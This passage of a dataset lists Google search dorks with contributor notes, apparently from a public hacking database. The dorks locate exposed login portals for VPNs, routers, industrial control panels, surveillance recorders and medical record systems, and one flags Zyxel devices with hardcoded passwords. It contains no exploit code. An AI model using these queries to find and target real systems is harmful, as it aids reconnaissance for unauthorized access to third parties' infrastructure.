Pappas"}, {"dork": "allintitle:\"CrushFTP WebInterface\"", "description": "Google Dork: allintitle:\"CrushFTP WebInterface\"\r\n\r\nDescription: This Google Dork helps in detecting various pages of CrushFTP\r\nWebInterface which includes login portals as well password reset/recovery\r\npages.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "intext:piwik \"login\"", "description": "#Exploit Title : PIWIK login pages.\r\n\r\n#Google Dork : intext:piwik \"login\"\r\n\r\n#Date : 12/10/2020\r\n\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "inurl:weblogin.cgi?=1", "description": "#Exploit Title : Displays login portals.\r\n\r\n#Google Dork : inurl:weblogin.cgi?=1\r\n\r\n#Date : 10/10/2020\r\n\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "\"Vigor Login Page\" + intext:\"Group\"", "description": "# Google Dork: \"Vigor Login Page\" + intext:\"Group\"\r\n\r\n# Vigor router login portals.\r\n\r\n# Date: 14/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"InfoView\" + \"Log On to InfoView\"", "description": "# Google Dork: intitle:\"InfoView\" + \"Log On to InfoView\"\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 15/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:Please Login SSL VPN inurl:remote/login intext:FortiClient", "description": "#Google Dork: intext:Please Login SSL VPN inurl:remote/login\r\n#intext:FortiClient\r\n#Description : Fortinet VPN login pages.\r\n#Date : 19/10/2020\r\n#Exploit Author: Aninda Saha\r\n\r\nProof Of Concept:"}, {"dork": "intitle:\"SiteOmat Loader\"", "description": "# Exploit Title: Orpak SiteOmat login portals\r\n\r\n# Google Dork: intitle:\"SiteOmat Loader\"\r\n# Author: Kitchaphan Singchai (idealphase)"}, {"dork": "intitle:\"pi-hole Admin console\" intext:\"login\"", "description": "#Google Dork: intitle:\"pi-hole Admin console\" intext:\"login\"\r\n#Description : Various pages containing pi hole login portals.\r\n#Date : 19/10/2020\r\n#Exploit Author: Aninda Saha"}, {"dork": "inurl:weblogin.cgi?=0", "description": "#Exploit Title : Displays login portals.\r\n\r\n#Google Dork : inurl:weblogin.cgi?=0\r\n\r\n#Date : 10/10/2020\r\n\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M\r\nReplyForward"}, {"dork": "site:sftp.*.*/ intext:\"login\" intitle:\"server login\"", "description": "# Google Dork: site:sftp.*.*/ intext:\"login\" intitle:\"server login\"\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 24/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintext:\"Copperfasten Technologies\" \"Login\"", "description": "# Title: Find websites using SpamTitan system\r\n# Google Dork: allintext:\"Copperfasten Technologies\" \"Login\"\r\n# Author: KawaiiPantsu"}, {"dork": "inurl:/adfs/ls/?SAMLRequest", "description": "# Google Dork: inurl:/adfs/ls/?SAMLRequest\r\n# Date: 10/22/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nEmail: javierbernardo001@gmail.com | Website: hack.com.ar"}, {"dork": "inurl:/adfs/ls/idpinitiatedsignon", "description": "# Google Dork: inurl:/adfs/ls/idpinitiatedsignon\r\n# Date: 10/28/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*"}, {"dork": "inurl:/eftclient/account/login.htm", "description": "# Exploit Title: *inurl:/eftclient/account/login.htm*\r\n# Google Dork: *inurl:/eftclient/account/login.htm*\r\n# Enhanced File Transfer (EFT) Login portal. EFT from Globalscape is an advanced, powerful managed file transfer (MFT) solution.\r\n# Dork Author: Sajan Dhakate\r\n\r\n*Thanks & Regards*\r\n*Sajan Dhakate*"}, {"dork": "inurl:\"/?q=user/password/\"", "description": "inurl:\"/?q=user/password/\"\r\nPages containing login portal:\r\n\r\nBR,\r\nReza Abasi(Turku)\r\nIranian cyber sec researcher"}, {"dork": "inurl:/?op=register", "description": "#Exploit Title : Displays various Login and registration portals.\r\n#Google Dork :inurl:/?op=register\r\n#Date : 17/11/2020\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "inurl:\"servicedesk/customer/user/login\"", "description": "# Google Dork: inurl:\"servicedesk/customer/user/login\"\r\n# Pages containing Login Portals (Service Desk Login Portals).\r\n# Date: 9/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Xenmobile Console Logon\"", "description": "# Google Dork: intitle:\"Xenmobile Console Logon\"\r\n# Date: 11/17/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nEmail: javierbernardo001@gmail.com | Website: hack.com.ar\r\nBuenos Aires - Argentina"}, {"dork": "inurl:login.seam", "description": "# Google Dork: inurl:login.seam\r\n# Date: 11/10/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "inurl:/adfs/oauth2/authorize", "description": "# Google Dork: inurl:/adfs/oauth2/authorize\r\n# Date: 10/29/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "intitle:\"irz\" \"router\" intext:login gsm info -site:*.com -site:*.net", "description": "# Google Dork: intitle:\"irz\" \"router\" intext:login gsm info -site:*.com -site:*.net\r\n# Title: IRZ router login page\r\n# Date: 11/18/2020\r\n# Author: Diego Gonzalez (shell_wizard)\r\n\r\nHave a nice day ;)\r\nDiego Gonzalez"}, {"dork": "site:portal.*.* intitle:\"login\"", "description": "Pages containing login portal:\r\n\r\nsite:portal.*.* intitle:\"login\"\r\n\r\nBR,\r\nReza Abasi(Turku)\r\nIranian cyber sec researcher"}, {"dork": "intitle:\"Insurance Admin Login\" | \"(c) Copyright 2020 Cityline Websites. All Rights Reserved.\" | \"http://www.citylinewebsites.com\"", "description": "# Google Dork: intitle:\"Insurance Admin Login\" | \"\u00a9 Copyright 2020 Cityline\r\nWebsites. All Rights Reserved.\" | \"http://www.citylinewebsites.com\"\r\n# Admin Login Pages\r\n# Date: 23/11/2020\r\n# Exploit Author: Ayd\u0131n Baran Ertemir"}, {"dork": "site:user.*.* intitle:\"login\"", "description": "Pages containing login portal:\r\n\r\nsite:user.*.* intitle:\"login\"\r\n\r\nBR,\r\nReza Abasi(Turku)\r\nIranian cyber sec researcher"}, {"dork": "site:password.*.* intitle:\"login\"", "description": "Pages containing login portal:\r\n\r\nsite:password.*.* intitle:\"login\"\r\n\r\nBR,\r\nReza Abasi(Turku)\r\nIranian cyber sec researcher"}, {"dork": "site:checkin.*.* intitle:\"login\"", "description": "Pages containing login portal:\r\n\r\nsite:checkin.*.* intitle:\"login\"\r\n\r\nBR,\r\nReza Abasi(Turku)\r\nIranian cyber sec researcher"}, {"dork": "intitle:\"web client: login\"", "description": "#Exploit Title :Pages Containing Login portals.\r\n\r\n#Google Dork : intitle:\"web client: login\"\r\n\r\n#Date : 4/12/2020\r\n\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "inurl:Sitefinity/Authenticate/SWT", "description": "# Google Dork: inurl:Sitefinity/Authenticate/SWT\r\n# Date: 12/1/2020\r\n# Exploit Author: Javier Bernardo\r\nPages Containing Login Portals\r\n\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "inurl:idp/prp.wsf", "description": "# Google Dork: inurl:idp/prp.wsf\r\n# Date: 12/10/2020\r\n# Pages Containing Login Portals\r\n# Exploit Author: Javier Bernardo\r\n\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "inurl:nidp/idff/sso", "description": "# Google Dork: inurl:nidp/idff/sso\r\n# Pages Containing Login Portals\r\n# Date: 12/10/2020\r\n# Exploit Author: Javier Bernardo\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "inurl:idp/Authn/UserPassword", "description": "# Google Dork: inurl:idp/Authn/UserPassword\r\n# Date: 12/17/2020\r\n# Exploit Author: Javier Bernardo\r\n\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "inurl:adfs inurl:wctx inurl:wtrealm -microsoft.com", "description": "Dork: inurl:adfs inurl:wctx inurl:wtrealm -microsoft.com\r\n\r\nDescription:\r\nFinding ADFS Login Panels\r\n\r\nThank you"}, {"dork": "intitle:\"Humatrix 8\"", "description": "# Exploit Title: HUMANICA Humatrix login portals\r\n# Google Dork: intitle:\"Humatrix 8\"\r\n# Author: Kitchaphan Singchai (idealphase)\r\n# Category: Pages Containing Login Portals"}, {"dork": "intitle:\"Exchange Log In\"", "description": "# Google Dork: intitle:\"Exchange Log In\"\r\n# Description: Microsoft Exchange login page 2006\r\n# Author: Saleh Al Zadjali (https://om.linkedin.com/in/saleh-alzadjali)\r\n\r\nBR,\r\nSaleh Al-Zadjali"}, {"dork": "inurl:oidc/authorize", "description": "# Google Dork: inurl:oidc/authorize\r\n# Date: 12/21/2020\r\n# Exploit Author: Javier Bernardo\r\n\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "inurl:authorization.ping", "description": "Google Dork: inurl:authorization.ping\r\nDescription: Pages containing portals for login or employee account recovery.\r\nDate: 01/01/2021\r\nAuthor: Sunil Singh"}, {"dork": "intitle:Login intext:HIKVISION inurl:login.asp?", "description": "Category: Pages Containing Login Portals\r\nNicholas Doropoulos"}, {"dork": "inurl:weblogin intitle:(\"USG20-VPN\"|\"USG20W-VPN\"|USG40|USG40W|USG60|USG60W|USG110|USG210|USG310|USG1100|USG1900|USG2200|\"ZyWALL110\"|\"ZyWALL310\"|\"ZyWALL1100\"|ATP100|ATP100W|ATP200|ATP500|ATP700|ATP800|VPN50|VPN100|VPN300|VPN000|\"FLEX\")", "description": "# Google Dork: inurl:weblogin\r\nintitle:(\"USG20-VPN\"|\"USG20W-VPN\"|USG40|USG40W|USG60|USG60W|USG110|USG210|USG310|USG1100|USG1900|USG2200|\"ZyWALL110\"|\"ZyWALL310\"|\"ZyWALL1100\"|ATP100|ATP100W|ATP200|ATP500|ATP700|ATP800|VPN50|VPN100|VPN300|VPN000|\"FLEX\")\r\n# Zyxel hardcoded password vuln hosts finder\r\n# Date: 1/6/2021\r\n# Exploit Author: Javier Bernardo\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "site:p2.*.* intitle:\"login\"", "description": "site:p2.*.* intitle:\"login\"\r\n\r\nBR,\r\nReza Abasi(Turku)\r\nIranian cyber sec researcher"}, {"dork": "inurl:jasperserver-pro/login.html", "description": "inurl:jasperserver-pro/login.html\r\nAuthor : Ali Hassam"}, {"dork": "intitle:\"phpLDAPadmin\" inurl:cmd.php", "description": "# Dork : intitle:\"phpLDAPadmin\" inurl:cmd.php\r\n# PhpLdapAdmin Server Login Portals\r\n# Author : Ambadi MP"}, {"dork": "intitle:\"iLO: localhost\" + \"Firmware Version\"", "description": "# Google Dork: intitle:\"iLO: localhost\" + \"Firmware Version\"\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 28/1/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Cisco Email Security Virtual Appliance\" inurl:csrfkey=", "description": "# Google Dork: intitle:\"Cisco Email Security Virtual Appliance\" inurl:csrfkey=\r\n\r\n# Cisco Email Security Virtual Appliance login portals.\r\n\r\n# Date: 3/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME\" inurl:\"status.php\"", "description": "Dork: intitle:\"D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME\" inurl:\"status.php\""}, {"dork": "inurl:index.php?s=/Admin/Public/login.html", "description": "Dork: inurl:index.php?s=/Admin/Public/login.html"}, {"dork": "inurl:ext/pwdreset", "description": "# Google Dork: inurl:ext/pwdreset\r\n# Date: 2/9/2020\r\n# Exploit Author: Javier Bernardo\r\n\r\n\r\n*Ethical Hacker | Information Security Engineer*"}, {"dork": "intitle:\"Radius Manager\" intext:\"Control Panel\"", "description": "# Google Dork: intitle:\"Radius Manager\" intext:\"Control Panel\"\r\n# Find Radius ISP control panels\r\n# Date: Feb. 8th,2020\r\n# Author: Kike Fontan"}, {"dork": "inurl:simplesaml/module", "description": "# Google Dork: inurl:simplesaml/module\r\n# Date: 2/15/2020\r\n# Exploit Author: Javier Bernardo\r\n# Pages Containing Login Portals\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "inurl:ushell/shells/abap", "description": "# Google Dork: inurl:ushell/shells/abap\r\n# Date: 2/15/2020\r\n# Exploit Author: Javier Bernardo\r\n# Pages Containing Login Portals\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "\"Username\" \"Password\" \"Please login to continue\" intitle:\"F660\"", "description": "# Dork: \"Username\" \"Password\" \"Please login to continue\" intitle:\"F660\""}, {"dork": "intitle:\"oracle business intelligence sign in\"", "description": "Google dork description: Oracle Business Intelligence Sign in page\r\n\r\nGoogle Search: inurl:\"intitle:\"oracle business intelligence sign in\"\"\r\n\r\nSubmitted by: Alfie\r\n\r\n\r\n-- \r\nRegards,\r\nAlfie."}, {"dork": "inurl:ui/login intitle:jfrog", "description": "# Google Dork: inurl:ui/login intitle:jfrog\r\n# Date: 2/8/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: Pages Containing Login Portals\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "intitle:\"ZXHN H108N\" intext:\"Welcome to ZXHN H108N\"", "description": "# Dork: intitle:\"ZXHN H108N\" intext:\"Welcome to ZXHN H108N\""}, {"dork": "inurl:ejbexplorer", "description": "# Google Dork: inurl:ejbexplorer\r\n# Date: 2/15/2020\r\n# Exploit Author: Javier Bernardo\r\n# Pages Containing Login Portals\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer\r\nBuenos Aires - Argentina"}, {"dork": "intitle:\"WEB LCT\" intext:\"Web local craft terminal\"", "description": "# Dork: intitle:\"WEB LCT\" intext:\"Web local craft terminal\""}, {"dork": "Copyright Huawei Technologies co. Ltd \"Account\" \"Password\" -site:huawei.com", "description": "# Dork: Copyright Huawei Technologies co. Ltd \"Account\" \"Password\" -site:huawei.com"}, {"dork": "\"Username\" \"Password\" \"Please login to continue\" intitle:\"F670\"", "description": "# Dork: \"Username\" \"Password\" \"Please login to continue\" intitle:\"F670\""}, {"dork": "site:*.com inurl:axis2-admin", "description": "Dork: site:*.com inurl:axis2-admin"}, {"dork": "intitle:\"Blue Iris Login\"", "description": "# Google Dork: intitle:\"Blue Iris Login\"\r\n\r\n# Various online devices (Blue Iris Video surveillance login portals).\r\n\r\n# Date: 03/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/dana-na/auth/url_default/welcome.cgi \"VPN\"", "description": "# Google Dork: inurl:/dana-na/auth/url_default/welcome.cgi \"VPN\"\r\n# VPN login portals.\r\n# Date: 04/03/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*.herokuapp.com intitle:login", "description": "# Dork: site:*.herokuapp.com intitle:login"}, {"dork": "intitle:\"Sign in to Cisco Finesse\"", "description": "# Exploit Title: Cisco Finesse login portal\r\n# Google Dork: intitle:\"Sign in to Cisco Finesse\"\r\n# Author: Kitchaphan Singchai (idealphase)\r\n# Category: Pages Containing Login Portals"}, {"dork": "inurl:pandora_console intitle:\"Pandora FMS\"", "description": "# Google Dork: intitle:\"Radius Manager\" intext:\"Control Panel\"\r\n# Find Pandora FMS control panels\r\n# Date: Mar. 13th,2021\r\n# Author: Kike Fontan\r\n# Reference: https://pandorafms.com/docs/index.php?title=Pandora:Documentation_es:Interfaz"}, {"dork": "intext:\"helpdesk software provided by deskpro\"", "description": "Dear Team,\r\n\r\nThe dork will display Pages Containing Login Portals.\r\n\r\nintext:\"helpdesk software provided by deskpro\"\r\n\r\n-- \r\nThanks & Regards,\r\nAnon Tuttu Venus"}, {"dork": "inurl:\"login.rsp\" \"Language\" -.com", "description": "# Google Dork: inurl:\"login.rsp\" \"Language\" -.com\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 15/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:webdynpro/dispatcher", "description": "# Google Dork: inurl:webdynpro/dispatcher\r\n# Date: 3/18/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar"}, {"dork": "intitle:\"NUUO Network Video Recorder Login\" \"Language\"", "description": "# Google Dork: intitle:\"NUUO Network Video Recorder Login\" \"Language\"\r\n\r\n# NUUO Network Video Recorder Login pages.\r\n\r\n# Date: 17/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:template.gch \"ZTE Corporation.\"", "description": "# Google Dork: inurl:template.gch \"ZTE Corporation.\"\r\n# Date: 18/03/2021\r\n# Exploit Author: Cuma KURT\r\n# Pages Containing Login Portals\r\n\r\nCuma KURT\r\n*Ethical Hacker | \u0130nformation Security Engineer\r\nIstanbul - Turkey"}, {"dork": "inurl:Main_Login.asp AND intext:\"Sign in with your ASUS router account\"", "description": "# Google Dork: inurl:Main_Login.asp AND intext:\"Sign in with your ASUS router account\"\r\n# Date: 18/03/2021\r\n# Exploit Author: Cuma KURT\r\n# Pages Containing Login Portals\r\n\r\nCuma KURT\r\n*Ethical Hacker | Information Security Engineer\r\nIstanbul - Turkey"}, {"dork": "intitle:\"Component Browser Login\"", "description": "# Exploit Title: Adobe Coldfusion login portal\r\n# Google Dork: intitle:\"Component Browser Login\"\r\n# Author: Kitchaphan Singchai (idealphase)\r\n# Category: Pages Containing Login Portals"}, {"dork": "inurl:\"/deltaweb/hmi_login.asp\" intext:\"login\"", "description": "# Google Dork: inurl:\"/deltaweb/hmi_login.asp\" intext:\"login\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 06/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:\"/login.htm\" \"Hitron Technologies\"", "description": "# Google Dork: intitle:\"Login\" \"Please sign in to EP SmartStart\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 12/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"UniFi Video\" \"login\" \"NVR\"", "description": "# Google Dork: intitle:\"UniFi Video\" \"login\" \"NVR\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 08/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Login\" intext:\"Herospeed Technology\"", "description": "# Google Dork: intitle:\"Login\" intext:\"Herospeed Technology\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 13/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"login\" \"Are you a patient\" \" eRAD\"", "description": "# Google Dork: intitle:\"login\" \"Are you a patient\" \" eRAD\"\r\n\r\n# Pages Containing Login Portals(EMR Systems)\r\n\r\n# Date: 15/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Frontier e-HR Login Page\"", "description": "# Google Dork: intitle:\"Frontier e-HR Login Page\"\r\n\r\n# Pages Containing Login Portals(EMR Systems)\r\n\r\n# Date: 15/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:b2b/init.do", "description": "Logins\r\n\r\n# Google Dork: inurl:b2b/init.do\r\n# Date: 4/18/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar"}, {"dork": "intitle:\"Web user login\"", "description": "# Google Dork: intitle:\"Web user login\"\r\n# Date: 4/18/2020\r\n# Exploit Author: Javier Bernardo"}, {"dork": "intitle:\"DIAM4 Login\"", "description": "# Google Dork: intitle:\"DIAM4 Login\"\r\n\r\n# Pages Containing Login Portals(EMR Systems)\r\n\r\n# Date: 15/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Sauter moduWeb - Login\"", "description": "# Google Dork: intitle:intitle:\"Sauter moduWeb - Login\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 12/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Greentree eHR\" \"Employee Code\"", "description": "# Google Dork: intitle:\"Greentree eHR\" \"Employee Code\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 15/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Payvand PACS\"", "description": "# Google Dork: intitle:\"Payvand PACS\"\r\n\r\n# Pages Containing Login Portals(EMR Systems)\r\n\r\n# Date: 15/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intext:\"Please select your account\" intext:\"SSL Login\"", "description": "# Dork: intext:\"Please select your account\" intext:\"SSL Login\""}, {"dork": "intitle:\"iLo\" \"Hewlett Packard Enterprise Development\" \"Firmware Version\" \" Local user name:\"", "description": "# Google Dork: intitle:\"iLo\" \"Hewlett Packard Enterprise Development\" \"Firmware Version\" \"Local user name:\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 20/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"NetScaler AAA\" inurl:logon/LogonPoint/tmindex.html", "description": "# Google Dork: intitle:\"NetScaler AAA\" inurl:logon/LogonPoint/tmindex.html\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 29/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Please Login\" inurl:\"/remote/login?lang=en\"", "description": "# Dork: intitle:\"Please Login\" inurl:\"/remote/login?lang=en\""}, {"dork": "intitle:\"Gophish - Login\"", "description": "# Dork: intitle:\"Gophish - Login\"\r\n# This dork found Gophish login panel.\r\n# Category : Pages Containing Login Portals\r\n# Author : Murat DEM\u0130RC\u0130"}, {"dork": "inurl:sslvpn_logon.shtml", "description": "#Dork: inurl:sslvpn_logon.shtml - By Simone Crema"}, {"dork": "intitle:\"ReACT Self-serve\"", "description": "# Dork: intitle:\"ReACT Self-serve\""}, {"dork": "inurl:glpi intitle:\"GLPI\" site:.br", "description": "# Google Dork: inurl:glpi intitle:\"GLPI\" site:.br\r\n# Dork Author: J3di M0nk"}, {"dork": "intext:\"Cisco Webui - Login\" -www -cisco.com", "description": "# Dork: intext:\"Cisco Webui - Login\" -www -cisco.com\r\n\r\nRegards,\r\nShezad Master"}, {"dork": "intitle:\"TOTOLINK\" inurl:\"/login.htm\"", "description": "# Dork: intitle:\"TOTOLINK\" inurl:\"/login.htm\"\r\n# (TOTOLink Router) Various Online Devices\r\n# Exploit Author: Shivani Arya"}, {"dork": "intitle:\"grafana\" inurl:\"/grafana/login\" \"Forgot your password\"", "description": "# Google Dork: intitle:\"grafana\" inurl:\"/grafana/login\" \"Forgot your password\"\r\n\r\n# Pages Containing Online Portals\r\n\r\n# Date: 03/05/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "Google Dork: inurl:\"/zm/index.php\"", "description": "# Google Dork: inurl:\"/zm/index.php\"\r\n# Description: Find ZoneMinder (video surveillance software) login portals.\r\n# Date: 05/10/2021.\r\n# Exploit Author: Sohaib E.B.\r\n# Category: Pages Containing Login Portals."}, {"dork": "intitle:\"Login\" intext:\"(Moka pot)\" inurl:\"login.php\"", "description": "# Dork: intitle:\"Login\" intext:\"(Moka pot)\" inurl:\"login.php\""}, {"dork": "intitle:\"GLPI - Authentication\"", "description": "# Dork: intitle:\"GLPI - Authentication\""}, {"dork": "intext:clave inurl:admin.php", "description": "# Exploit Title: Pages containing login portals\r\n# Google Dork: intext:clave inurl:admin.php\r\n# Date: 2021-05-14\r\n# Exploit Author: Aniket Prabhakar"}, {"dork": "intitle:\"Teampass\" intext:\"Server Time\"", "description": "# Dork: intitle:\"Teampass\" intext:\"Server Time\""}, {"dork": "intitle:\"Gargoyle Router Management Utility\" intext:\"Enter Admin Password\"", "description": "# Dork: intitle:\"Gargoyle Router Management Utility\" intext:\"Enter Admin Password\""}, {"dork": "\"Saferoads VMS\" \"login\"", "description": "# Dork: \"Saferoads VMS\" \"login\"\r\n# Find login portals for Roadsigns"}, {"dork": "intitle:\"OpenWrt - LuCI\" intext:\"Powered by LuCI | OpenWrt\"", "description": "# Google Dork: intitle:\"OpenWrt - LuCI\" intext:\"Powered by LuCI | OpenWrt\"\r\n# Pages Containing Login Portals\r\n# Date: 22/04/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Plesk Obsidian\" inurl:login_up.php", "description": "# Dork: intitle:\"Plesk Obsidian\" inurl:login_up.php"}, {"dork": "\"Name\" \"Password\" intitle:\"Business LAN\"", "description": "\"Name\" \"Password\" intitle:\"Business LAN\""}, {"dork": "intitle:LANCOM intitle:login \"LANCOM Systems GmbH\"", "description": "# Exploit Title: Various Online Devices\r\n# Google Dork: intitle:LANCOM intitle:login \"LANCOM Systems GmbH\"\r\n# Date: 2021-05-20\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "Zenario CMS Login Page", "description": "# Google Dork: Zenario CMS Login Page\r\n# Date: 24th May 2021\r\n# Exploit Author: Harsh Joshi, Omkar Ghaisas , Amit Chavare\r\n# Dork : intitle:\"Welcome to Zenario\"\r\n\r\n\r\n*Thanks*\r\n\r\n*Harsh Joshi"}, {"dork": "inurl:/index.php/admin/authentication/ intext:clave", "description": "# Exploit Title: Pages containing login portals\r\n# Google Dork: inurl:/index.php/admin/authentication/ intext:clave\r\n# Date: 2021-05-14\r\n# Exploit Author: Aniket Prabhakar (prabhakar123456aniket@gmail.com)"}, {"dork": "intext:\"Powered by Synnefo\"", "description": "# Dork: intext:\"Powered by Synnefo\""}, {"dork": "inurl:EMSWebClient/Login.aspx", "description": "#Exploit Title : Pages Containing Login portals.\r\n#Google Dork : inurl:EMSWebClient/Login.aspx\r\n#Exploit Author: Md Anzaruddin\r\n\r\n#Regards\r\n#Md Anzaruddin"}, {"dork": "intitle:\"ONU\" intext:\"Please login to continue...\"", "description": "# Dork: intitle:\"ONU\" intext:\"Please login to continue...\""}, {"dork": "intitle:\"Scalance web management\" \"Switch to insecure HTTP\"", "description": "# Google Dork: intitle:\"Scalance web management\" \"Switch to insecure HTTP\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 29/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Login\" inurl:web/frame/login.html?ssl=", "description": "# Google Dork: intitle:\"Login\" inurl:web/frame/login.html?ssl=\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Huawei Inner Web\"", "description": "# Dork: intitle:\"Huawei Inner Web\""}, {"dork": "intitle:\"Viewer for Samsung NVR\"", "description": "# Google Dork: intitle:\"Viewer for Samsung NVR\"\r\n# Date: 28/05/2021\r\n# Exploit Author: Cuma KURT\r\n# Pages Containing Login Portals\r\n\r\nCuma KURT\r\n*Ethical Hacker | \u0130nformation Security Engineer\r\nIstanbul - Turkey"}, {"dork": "\"Yeastar Information Technology Co., Ltd. All Rights Reserved.\" -yeastar.com", "description": "# Dork: \"Yeastar Information Technology Co., Ltd. All Rights Reserved.\" -yeastar.com"}, {"dork": "intitle:\"Ubiquiti\" intext:\"Please login to manage your wireless device.\"", "description": "# Dork: intitle:\"Ubiquiti\" intext:\"Please login to manage your wireless device.\""}, {"dork": "intitle:\"Webmodule\" inurl:\"/webmodule-ee/login.seam\" \"Version\"", "description": "# Google Dork: intitle:\"Webmodule\" inurl:\"/webmodule-ee/login.seam\" \"Version\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 03/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"GLPI - \u0410\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f\" intext:\"GLPI Copyright\"", "description": "# Google Dork: intitle:\"GLPI - \u0410\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f\" intext:\"GLPI Copyright\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 09/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Schneider Electric Telecontrol - Industrial Web Control\" intext:\"Xflow \"", "description": "# Google Dork: intitle:\"Schneider Electric Telecontrol - Industrial Web Control\" intext:\"Xflow\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 